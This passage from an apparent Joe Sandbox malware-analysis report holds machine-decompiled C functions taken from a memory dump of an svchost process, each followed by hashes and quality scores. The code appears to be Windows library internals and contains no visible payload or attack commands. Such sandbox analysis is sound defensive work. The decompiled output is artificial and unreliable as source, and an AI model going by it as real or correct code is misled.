                                          					_t102 = _t74;
                                          					_push( &_v1060);
                                          					_push(_t121);
                                          					_push(_t74);
                                          					_push(2);
                                          					_push( &_v1048);
                                          					_push(_t116);
                                          					_t122 = E03A69650();
                                          					__eflags = _t122;
                                          					if(_t122 >= 0) {
                                          						L7:
                                          						_t114 = _a12;
                                          						__eflags = _t114;
                                          						if(_t114 != 0) {
                                          							_t77 = _a20;
                                          							L26:
                                          							_t109 =  *(_t102 + 4);
                                          							__eflags = _t109 - 3;
                                          							if(_t109 == 3) {
                                          								L55:
                                          								__eflags = _t114 - _t109;
                                          								if(_t114 != _t109) {
                                          									L59:
                                          									_t122 = 0xc0000024;
                                          									L15:
                                          									_t78 = _v1052;
                                          									__eflags = _t78;
                                          									if(_t78 != 0) {
                                          										L03A477F0( *( *[fs:0x30] + 0x18), 0, _t78);
                                          									}
                                          									_t68 = _t122;
                                          									goto L4;
                                          								}
                                          								_t110 = _v1056;
                                          								_t118 =  *((intOrPtr*)(_t102 + 8));
                                          								_v1060 = _t118;
                                          								__eflags = _t110;
                                          								if(_t110 == 0) {
                                          									L10:
                                          									_t122 = 0x80000005;
                                          									L11:
                                          									_t81 = _v1040;
                                          									__eflags = _t81;
                                          									if(_t81 == 0) {
                                          										goto L15;
                                          									}
                                          									__eflags = _t122;
                                          									if(_t122 >= 0) {
                                          										L14:
                                          										 *_t81 = _t118;
                                          										goto L15;
                                          									}
                                          									__eflags = _t122 - 0x80000005;
                                          									if(_t122 != 0x80000005) {
                                          										goto L15;
                                          									}
                                          									goto L14;
                                          								}
                                          								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                                          								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                                          									goto L10;
                                          								}
                                          								_push( *((intOrPtr*)(_t102 + 8)));
                                          								_t59 = _t102 + 0xc; // 0xc
                                          								_push(_t110);
                                          								L54:
                                          								E03A6F3E0();
                                          								_t125 = _t125 + 0xc;
                                          								goto L11;
                                          							}
                                          							__eflags = _t109 - 7;
                                          							if(_t109 == 7) {
                                          								goto L55;
                                          							}
                                          							_t118 = 4;
                                          							__eflags = _t109 - _t118;
                                          							if(_t109 != _t118) {
                                          								__eflags = _t109 - 0xb;
                                          								if(_t109 != 0xb) {
                                          									__eflags = _t109 - 1;
                                          									if(_t109 == 1) {
                                          										__eflags = _t114 - _t118;
                                          										if(_t114 != _t118) {
                                          											_t118 =  *((intOrPtr*)(_t102 + 8));
                                          											_v1060 = _t118;
                                          											__eflags = _t118 - _t77;
                                          											if(_t118 > _t77) {
                                          												goto L10;
                                          											}
                                          											_push(_t118);
                                          											_t56 = _t102 + 0xc; // 0xc
                                          											_push(_v1056);
                                          											goto L54;
                                          										}
                                          										__eflags = _t77 - _t118;
                                          										if(_t77 != _t118) {
                                          											L34:
                                          											_t122 = 0xc0000004;
                                          											goto L15;
                                          										}
                                          										_t111 = _v1056;
                                          										__eflags = _t111 & 0x00000003;
                                          										if((_t111 & 0x00000003) == 0) {
                                          											_v1060 = _t118;
                                          											__eflags = _t111;
                                          											if(__eflags == 0) {
                                          												goto L10;
                                          											}
                                          											_t42 = _t102 + 0xc; // 0xc
                                          											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                                          											_v1048 =  *((intOrPtr*)(_t102 + 8));
                                          											_push(_t111);
                                          											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                                          											_push(0);
                                          											_push( &_v1048);
                                          											_t122 = E03A613C0(_t102, _t118, _t122, __eflags);
                                          											L44:
                                          											_t118 = _v1072;
                                          											goto L11;
                                          										}
                                          										_t122 = 0x80000002;
                                          										goto L15;
                                          									}
                                          									_t122 = 0xc0000024;
                                          									goto L44;
                                          								}
                                          								__eflags = _t114 - _t109;
                                          								if(_t114 != _t109) {
                                          									goto L59;
                                          								}
                                          								_t118 = 8;
                                          								__eflags = _t77 - _t118;
                                          								if(_t77 != _t118) {
                                          									goto L34;
                                          								}
                                          								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                          								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                          									goto L34;
                                          								}
                                          								_t112 = _v1056;
                                          								_v1060 = _t118;
                                          								__eflags = _t112;
                                          								if(_t112 == 0) {
                                          									goto L10;
                                          								}
                                          								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                                          								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                                          								goto L11;
                                          							}
                                          							__eflags = _t114 - _t118;
                                          							if(_t114 != _t118) {
                                          								goto L59;
                                          							}
                                          							__eflags = _t77 - _t118;
                                          							if(_t77 != _t118) {
                                          								goto L34;
                                          							}
                                          							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                          							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                          								goto L34;
                                          							}
                                          							_t113 = _v1056;
                                          							_v1060 = _t118;
                                          							__eflags = _t113;
                                          							if(_t113 == 0) {
                                          								goto L10;
                                          							}
                                          							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                                          							goto L11;
                                          						}
                                          						_t118 =  *((intOrPtr*)(_t102 + 8));
                                          						__eflags = _t118 - _a20;
                                          						if(_t118 <= _a20) {
                                          							_t114 =  *(_t102 + 4);
                                          							_t77 = _t118;
                                          							goto L26;
                                          						}
                                          						_v1060 = _t118;
                                          						goto L10;
                                          					}
                                          					__eflags = _t122 - 0x80000005;
                                          					if(_t122 != 0x80000005) {
                                          						goto L15;
                                          					}
                                          					L03A477F0( *( *[fs:0x30] + 0x18), 0, _t102);
                                          					L18:
                                          					_t121 = _v1060;
                                          					goto L19;
                                          				}
                                          				_push( &_v1060);
                                          				_push(0x400);
                                          				_t102 =  &_v1036;
                                          				_push(_t102);
                                          				_push(2);
                                          				_push( &_v1048);
                                          				_push(_t116);
                                          				_t122 = E03A69650();
                                          				if(_t122 >= 0) {
                                          					__eflags = 0;
                                          					_v1052 = 0;
                                          					goto L7;
                                          				}
                                          				if(_t122 == 0x80000005) {
                                          					goto L18;
                                          				}
                                          				goto L4;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: afe5334f47cda89cf61bdfa867f150df2861e8e9ead171363b5b9a0cfb350d4c
                                          • Instruction ID: b444704a34b6354cb6f893fdadf1acda0ecc086986c5a271b99c21414ff5dffa
                                          • Opcode Fuzzy Hash: afe5334f47cda89cf61bdfa867f150df2861e8e9ead171363b5b9a0cfb350d4c
                                          • Instruction Fuzzy Hash: 46817D756242019FEF25CF14C880A7AB7E8EF84254F58496FED46AB240D332DD45CBB2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 39%
                                          			E03ABB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
                                          				char _v8;
                                          				signed int _v12;
                                          				signed int _t80;
                                          				signed int _t83;
                                          				intOrPtr _t89;
                                          				signed int _t92;
                                          				signed char _t106;
                                          				signed int* _t107;
                                          				intOrPtr _t108;
                                          				intOrPtr _t109;
                                          				signed int _t114;
                                          				void* _t115;
                                          				void* _t117;
                                          				void* _t119;
                                          				void* _t122;
                                          				signed int _t123;
                                          				signed int* _t124;
                                          
                                          				_t106 = _a12;
                                          				if((_t106 & 0xfffffffc) != 0) {
                                          					return 0xc000000d;
                                          				}
                                          				if((_t106 & 0x00000002) != 0) {
                                          					_t106 = _t106 | 0x00000001;
                                          				}
                                          				_t109 =  *0x3b17b9c; // 0x0
                                          				_t124 = L03A44620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
                                          				if(_t124 != 0) {
                                          					 *_t124 =  *_t124 & 0x00000000;
                                          					_t124[1] = _t124[1] & 0x00000000;
                                          					_t124[4] = _t124[4] & 0x00000000;
                                          					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
                                          						L13:
                                          						_push(_t124);
                                          						if((_t106 & 0x00000002) != 0) {
                                          							_push(0x200);
                                          							_push(0x28);
                                          							_push(0xffffffff);
                                          							_t122 = E03A69800();
                                          							if(_t122 < 0) {
                                          								L33:
                                          								if((_t124[4] & 0x00000001) != 0) {
                                          									_push(4);
                                          									_t64 =  &(_t124[1]); // 0x4
                                          									_t107 = _t64;
                                          									_push(_t107);
                                          									_push(5);
                                          									_push(0xfffffffe);
                                          									E03A695B0();
                                          									if( *_t107 != 0) {
                                          										_push( *_t107);
                                          										E03A695D0();
                                          									}
                                          								}
                                          								_push(_t124);
                                          								_push(0);
                                          								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                          								L37:
                                          								L03A477F0();
                                          								return _t122;
                                          							}
                                          							_t124[4] = _t124[4] | 0x00000002;
                                          							L18:
                                          							_t108 = _a8;
                                          							_t29 =  &(_t124[0x105]); // 0x414
                                          							_t80 = _t29;
                                          							_t30 =  &(_t124[5]); // 0x14
                                          							_t124[3] = _t80;
                                          							_t123 = 0;
                                          							_t124[2] = _t30;
                                          							 *_t80 = _t108;
                                          							if(_t108 == 0) {
                                          								L21:
                                          								_t112 = 0x400;
                                          								_push( &_v8);
                                          								_v8 = 0x400;
                                          								_push(_t124[2]);
                                          								_push(0x400);
                                          								_push(_t124[3]);
                                          								_push(0);
                                          								_push( *_t124);
                                          								_t122 = E03A69910();
                                          								if(_t122 != 0xc0000023) {
                                          									L26:
                                          									if(_t122 != 0x106) {
                                          										L40:
                                          										if(_t122 < 0) {
                                          											L29:
                                          											_t83 = _t124[2];
                                          											if(_t83 != 0) {
                                          												_t59 =  &(_t124[5]); // 0x14
                                          												if(_t83 != _t59) {
                                          													L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
                                          												}
                                          											}
                                          											_push( *_t124);
                                          											E03A695D0();
                                          											goto L33;
                                          										}
                                          										 *_a16 = _t124;
                                          										return 0;
                                          									}
                                          									if(_t108 != 1) {
                                          										_t122 = 0;
                                          										goto L40;
                                          									}
                                          									_t122 = 0xc0000061;
                                          									goto L29;
                                          								} else {
                                          									goto L22;
                                          								}
                                          								while(1) {
                                          									L22:
                                          									_t89 =  *0x3b17b9c; // 0x0
                                          									_t92 = L03A44620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
                                          									_t124[2] = _t92;
                                          									if(_t92 == 0) {
                                          										break;
                                          									}
                                          									_t112 =  &_v8;
                                          									_push( &_v8);
                                          									_push(_t92);
                                          									_push(_v8);
                                          									_push(_t124[3]);
                                          									_push(0);
                                          									_push( *_t124);
                                          									_t122 = E03A69910();
                                          									if(_t122 != 0xc0000023) {
                                          										goto L26;
                                          									}
                                          									L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
                                          								}
                                          								_t122 = 0xc0000017;
                                          								goto L26;
                                          							}
                                          							_t119 = 0;
                                          							do {
                                          								_t114 = _t124[3];
                                          								_t119 = _t119 + 0xc;
                                          								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
                                          								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
                                          								_t123 = _t123 + 1;
                                          								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
                                          							} while (_t123 < _t108);
                                          							goto L21;
                                          						}
                                          						_push(0x28);
                                          						_push(3);
                                          						_t122 = E03A2A7B0();
                                          						if(_t122 < 0) {
                                          							goto L33;
                                          						}
                                          						_t124[4] = _t124[4] | 0x00000001;
                                          						goto L18;
                                          					}
                                          					if((_t106 & 0x00000001) == 0) {
                                          						_t115 = 0x28;
                                          						_t122 = E03ABE7D3(_t115, _t124);
                                          						if(_t122 < 0) {
                                          							L9:
                                          							_push(_t124);
                                          							_push(0);
                                          							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
                                          							goto L37;
                                          						}
                                          						L12:
                                          						if( *_t124 != 0) {
                                          							goto L18;
                                          						}
                                          						goto L13;
                                          					}
                                          					_t15 =  &(_t124[1]); // 0x4
                                          					_t117 = 4;
                                          					_t122 = E03ABE7D3(_t117, _t15);
                                          					if(_t122 >= 0) {
                                          						_t124[4] = _t124[4] | 0x00000001;
                                          						_v12 = _v12 & 0x00000000;
                                          						_push(4);
                                          						_push( &_v12);
                                          						_push(5);
                                          						_push(0xfffffffe);
                                          						E03A695B0();
                                          						goto L12;
                                          					}
                                          					goto L9;
                                          				} else {
                                          					return 0xc0000017;
                                          				}
                                          			}
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03abba41
                                          0x03abba41
                                          0x03abba41
                                          0x03abba58
                                          0x03abba5d
                                          0x03abba62
                                          0x00000000
                                          0x00000000
                                          0x03abba64
                                          0x03abba67
                                          0x03abba68
                                          0x03abba69
                                          0x03abba6c
                                          0x03abba6f
                                          0x03abba71
                                          0x03abba78
                                          0x03abba80
                                          0x00000000
                                          0x00000000
                                          0x03abba90
                                          0x03abba90
                                          0x03abba97
                                          0x00000000
                                          0x03abba97
                                          0x03abb9f5
                                          0x03abb9f7
                                          0x03abb9f7
                                          0x03abb9fa
                                          0x03abba03
                                          0x03abba07
                                          0x03abba0c
                                          0x03abba10
                                          0x03abba17
                                          0x00000000
                                          0x03abb9f7
                                          0x03abb9a6
                                          0x03abb9a8
                                          0x03abb9af
                                          0x03abb9b3
                                          0x00000000
                                          0x00000000
                                          0x03abb9b9
                                          0x00000000
                                          0x03abb9b9
                                          0x03abb94d
                                          0x03abb98f
                                          0x03abb995
                                          0x03abb999
                                          0x03abb960
                                          0x03abb967
                                          0x03abb968
                                          0x03abb96a
                                          0x00000000
                                          0x03abb96a
                                          0x03abb99b
                                          0x03abb99e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x03abb99e
                                          0x03abb951
                                          0x03abb954
                                          0x03abb95a
                                          0x03abb95e
                                          0x03abb972
                                          0x03abb979
                                          0x03abb97d
                                          0x03abb97f
                                          0x03abb980
                                          0x03abb982
                                          0x03abb984
                                          0x00000000
                                          0x03abb984
                                          0x00000000
                                          0x03abb926
                                          0x00000000
                                          0x03abb926

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: eeb561057bfb06d934d3c100f21510e61fea6e992fed1ba1d18f2b93c932ede9
                                          • Instruction ID: 06e914e9c9d33d40cba9739362b21a255f889b3af801ee7b3c37b31500fa3f19
                                          • Opcode Fuzzy Hash: eeb561057bfb06d934d3c100f21510e61fea6e992fed1ba1d18f2b93c932ede9
                                          • Instruction Fuzzy Hash: FB712036600701EFD731DF24C940FAABBB9EB40720F18492EE6558B2A2DB71E944CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 79%
                                          			E03AA6DC9(signed int __ecx, void* __edx) {
                                          				unsigned int _v8;
                                          				intOrPtr _v12;
                                          				signed int _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				char _v32;
                                          				char _v36;
                                          				char _v40;
                                          				char _v44;
                                          				char _v48;
                                          				char _v52;
                                          				char _v56;
                                          				char _v60;
                                          				void* _t87;
                                          				void* _t95;
                                          				signed char* _t96;
                                          				signed int _t107;
                                          				signed int _t136;
                                          				signed char* _t137;
                                          				void* _t157;
                                          				void* _t161;
                                          				void* _t167;
                                          				intOrPtr _t168;
                                          				void* _t174;
                                          				void* _t175;
                                          				signed int _t176;
                                          				void* _t177;
                                          
                                          				_t136 = __ecx;
                                          				_v44 = 0;
                                          				_t167 = __edx;
                                          				_v40 = 0;
                                          				_v36 = 0;
                                          				_v32 = 0;
                                          				_v60 = 0;
                                          				_v56 = 0;
                                          				_v52 = 0;
                                          				_v48 = 0;
                                          				_v16 = __ecx;
                                          				_t87 = L03A44620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
                                          				_t175 = _t87;
                                          				if(_t175 != 0) {
                                          					_t11 = _t175 + 0x30; // 0x30
                                          					 *((short*)(_t175 + 6)) = 0x14d4;
                                          					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
                                          					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
                                          					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
                                          					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
                                          					E03AA6B4C(_t167, _t11, 0x214,  &_v8);
                                          					_v12 = _v8 + 0x10;
                                          					_t95 = E03A47D50();
                                          					_t137 = 0x7ffe0384;
                                          					if(_t95 == 0) {
                                          						_t96 = 0x7ffe0384;
                                          					} else {
                                          						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          					}
                                          					_push(_t175);
                                          					_push(_v12);
                                          					_push(0x402);
                                          					_push( *_t96 & 0x000000ff);
                                          					E03A69AE0();
                                          					_t87 = L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
                                          					_t176 = _v16;
                                          					if((_t176 & 0x00000100) != 0) {
                                          						_push( &_v36);
                                          						_t157 = 4;
                                          						_t87 = E03AA795D( *((intOrPtr*)(_t167 + 8)), _t157);
                                          						if(_t87 >= 0) {
                                          							_v24 = E03AA795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
                                          							_v28 = E03AA795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
                                          							_push( &_v52);
                                          							_t161 = 5;
                                          							_t168 = E03AA795D( *((intOrPtr*)(_t167 + 8)), _t161);
                                          							_v20 = _t168;
                                          							_t107 = L03A44620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
                                          							_v16 = _t107;
                                          							if(_t107 != 0) {
                                          								_v8 = _v8 & 0x00000000;
                                          								 *(_t107 + 0x20) = _t176;
                                          								 *((short*)(_t107 + 6)) = 0x14d5;
                                          								_t47 = _t107 + 0x24; // 0x24
                                          								_t177 = _t47;
                                          								E03AA6B4C( &_v36, _t177, 0xc78,  &_v8);
                                          								_t51 = _v8 + 4; // 0x4
                                          								_t178 = _t177 + (_v8 >> 1) * 2;
                                          								_v12 = _t51;
                                          								E03AA6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                          								_v12 = _v12 + _v8;
                                          								E03AA6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
                                          								_t125 = _v8;
                                          								_v12 = _v12 + _v8;
                                          								E03AA6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
                                          								_t174 = _v12 + _v8;
                                          								if(E03A47D50() != 0) {
                                          									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          								}
                                          								_push(_v16);
                                          								_push(_t174);
                                          								_push(0x402);
                                          								_push( *_t137 & 0x000000ff);
                                          								E03A69AE0();
                                          								L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
                                          								_t168 = _v20;
                                          							}
                                          							_t87 = L03A42400( &_v36);
                                          							if(_v24 >= 0) {
                                          								_t87 = L03A42400( &_v44);
                                          							}
                                          							if(_t168 >= 0) {
                                          								_t87 = L03A42400( &_v52);
                                          							}
                                          							if(_v28 >= 0) {
                                          								return L03A42400( &_v60);
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _t87;
                                          			}
































                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                          • Instruction ID: 127cebd718ab293bc5adbb2c5450ea8c4bb7d139579dcd2b7a750a3152fff21d
                                          • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                          • Instruction Fuzzy Hash: A0716076900609AFCB10DFA9CA44AEEFBB9FF48714F14456AE505AB350DB34EA41CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 78%
                                          			E03A252A5(char __ecx) {
                                          				char _v20;
                                          				char _v28;
                                          				char _v29;
                                          				void* _v32;
                                          				void* _v36;
                                          				void* _v37;
                                          				void* _v38;
                                          				void* _v40;
                                          				void* _v46;
                                          				void* _v64;
                                          				void* __ebx;
                                          				intOrPtr* _t49;
                                          				signed int _t53;
                                          				short _t85;
                                          				signed int _t87;
                                          				signed int _t88;
                                          				signed int _t89;
                                          				intOrPtr _t101;
                                          				intOrPtr* _t102;
                                          				intOrPtr* _t104;
                                          				signed int _t106;
                                          				void* _t108;
                                          
                                          				_t93 = __ecx;
                                          				_t108 = (_t106 & 0xfffffff8) - 0x1c;
                                          				_push(_t88);
                                          				_v29 = __ecx;
                                          				_t89 = _t88 | 0xffffffff;
                                          				while(1) {
                                          					E03A3EEF0(0x3b179a0);
                                          					_t104 =  *0x3b18210; // 0x34037b8
                                          					if(_t104 == 0) {
                                          						break;
                                          					}
                                          					asm("lock inc dword [esi]");
                                          					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
                                          					E03A3EB70(_t93, 0x3b179a0);
                                          					if( *((char*)(_t108 + 0xf)) != 0) {
                                          						_t101 =  *0x7ffe02dc;
                                          						__eflags =  *(_t104 + 0x14) & 0x00000001;
                                          						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
                                          							L9:
                                          							_push(0);
                                          							_push(0);
                                          							_push(0);
                                          							_push(0);
                                          							_push(0x90028);
                                          							_push(_t108 + 0x20);
                                          							_push(0);
                                          							_push(0);
                                          							_push(0);
                                          							_push( *((intOrPtr*)(_t104 + 4)));
                                          							_t53 = E03A69890();
                                          							__eflags = _t53;
                                          							if(_t53 >= 0) {
                                          								__eflags =  *(_t104 + 0x14) & 0x00000001;
                                          								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
                                          									E03A3EEF0(0x3b179a0);
                                          									 *((intOrPtr*)(_t104 + 8)) = _t101;
                                          									E03A3EB70(0, 0x3b179a0);
                                          								}
                                          								goto L3;
                                          							}
                                          							__eflags = _t53 - 0xc0000012;
                                          							if(__eflags == 0) {
                                          								L12:
                                          								_t13 = _t104 + 0xc; // 0x34037c5
                                          								_t93 = _t13;
                                          								 *((char*)(_t108 + 0x12)) = 0;
                                          								__eflags = E03A5F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                          								if(__eflags >= 0) {
                                          									L15:
                                          									_t102 = _v28;
                                          									 *_t102 = 2;
                                          									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                          									E03A3EEF0(0x3b179a0);
                                          									__eflags =  *0x3b18210 - _t104; // 0x34037b8
                                          									if(__eflags == 0) {
                                          										__eflags =  *((char*)(_t108 + 0xe));
                                          										_t95 =  *((intOrPtr*)(_t108 + 0x14));
                                          										 *0x3b18210 = _t102;
                                          										_t32 = _t102 + 0xc; // 0x0
                                          										 *_t95 =  *_t32;
                                          										_t33 = _t102 + 0x10; // 0x0
                                          										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
                                          										_t35 = _t102 + 4; // 0xffffffff
                                          										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
                                          										if(__eflags != 0) {
                                          											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
                                          											E03AA4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
                                          										}
                                          										E03A3EB70(_t95, 0x3b179a0);
                                          										asm("lock xadd [esi], eax");
                                          										if(__eflags == 0) {
                                          											_push( *((intOrPtr*)(_t104 + 4)));
                                          											E03A695D0();
                                          											L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                          											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                          										}
                                          										asm("lock xadd [esi], ebx");
                                          										__eflags = _t89 == 1;
                                          										if(_t89 == 1) {
                                          											_push( *((intOrPtr*)(_t104 + 4)));
                                          											E03A695D0();
                                          											L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                          											_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                          										}
                                          										_t49 = _t102;
                                          										L4:
                                          										return _t49;
                                          									}
                                          									E03A3EB70(_t93, 0x3b179a0);
                                          									asm("lock xadd [esi], eax");
                                          									if(__eflags == 0) {
                                          										_push( *((intOrPtr*)(_t104 + 4)));
                                          										E03A695D0();
                                          										L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
                                          										_t102 =  *((intOrPtr*)(_t108 + 0x10));
                                          									}
                                          									 *_t102 = 1;
                                          									asm("lock xadd [edi], eax");
                                          									if(__eflags == 0) {
                                          										_t28 = _t102 + 4; // 0xffffffff
                                          										_push( *_t28);
                                          										E03A695D0();
                                          										L03A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
                                          									}
                                          									continue;
                                          								}
                                          								_t93 =  &_v20;
                                          								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
                                          								_t85 = 6;
                                          								_v20 = _t85;
                                          								_t87 = E03A5F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
                                          								__eflags = _t87;
                                          								if(_t87 < 0) {
                                          									goto L3;
                                          								}
                                          								 *((char*)(_t108 + 0xe)) = 1;
                                          								goto L15;
                                          							}
                                          							__eflags = _t53 - 0xc000026e;
                                          							if(__eflags != 0) {
                                          								goto L3;
                                          							}
                                          							goto L12;
                                          						}
                                          						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
                                          						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
                                          							goto L3;
                                          						} else {
                                          							goto L9;
                                          						}
                                          					}
                                          					L3:
                                          					_t49 = _t104;
                                          					goto L4;
                                          				}
                                          				_t49 = 0;
                                          				goto L4;
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.434919800.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_3a00000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 06b088d0cfe8fbce556114c93b85e5828b3f97427b4eb216c07a24e945b85fe2
                                          • Instruction ID: 2f1415ea44ce82524f57d83dcf46257bacb909851b97d30e5937c8fc84f6a241
                                          • Opcode Fuzzy Hash: 06b088d0cfe8fbce556114c93b85e5828b3f97427b4eb216c07a24e945b85fe2
                                          • Instruction Fuzzy Hash: C551AA75605741AFC321EF68CA41B2BBBE8BF45714F18491FE4958B691E770E808CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E03A52AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
                                          				signed short* _v8;
                                          				signed short* _v12;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr* _v28;
                                          				signed int _v32;
                                          				signed int _v36;
                                          				short _t56;
                                          				signed int _t57;
                                          				intOrPtr _t58;
                                          				signed short* _t61;
                                          				intOrPtr _t72;
                                          				intOrPtr _t75;
                                          				intOrPtr _t84;
                                          				intOrPtr _t87;
                                          				intOrPtr* _t90;
                                          				signed short* _t91;
                                          				signed int _t95;
                                          				signed short* _t96;
                                          				intOrPtr _t97;
                                          				intOrPtr _t102;
                                          				signed int _t108;
                                          				intOrPtr _t110;
                                          				signed int _t111;
                                          				signed short* _t112;
                                          				void* _t113;
                                          				signed int _t116;
                                          				signed short** _t119;
                                          				short* _t120;
                                          				signed int _t123;
                                          				signed int _t124;
                                          				void* _t125;
                                          				intOrPtr _t127;
                                          				signed int _t128;
                                          
                                          				_t90 = __ecx;
                                          				_v16 = __edx;
                                          				_t108 = _a4;
                                          				_v28 = __ecx;
                                          				_t4 = _t108 - 1; // -1
                                          				if(_t4 > 0x13) {
                                          					L15:
                                          					_t56 = 0xc0000100;
                                          					L16:
                                          					return _t56;
                                          				}
                                          				_t57 = _t108 * 0x1c;
                                          				_v32 = _t57;
                                          				_t6 = _t57 + 0x3b18204; // 0x0
                                          				_t123 =  *_t6;
                                          				_t7 = _t57 + 0x3b18208; // 0x3b18207
                                          				_t8 = _t57 + 0x3b18208; // 0x3b18207
                                          				_t119 = _t8;
                                          				_v36 = _t123;
                                          				_t110 = _t7 + _t123 * 8;
                                          				_v24 = _t110;
                                          				_t111 = _a4;
                                          				if(_t119 >= _t110) {
                                          					L12:
                                          					if(_t123 != 3) {
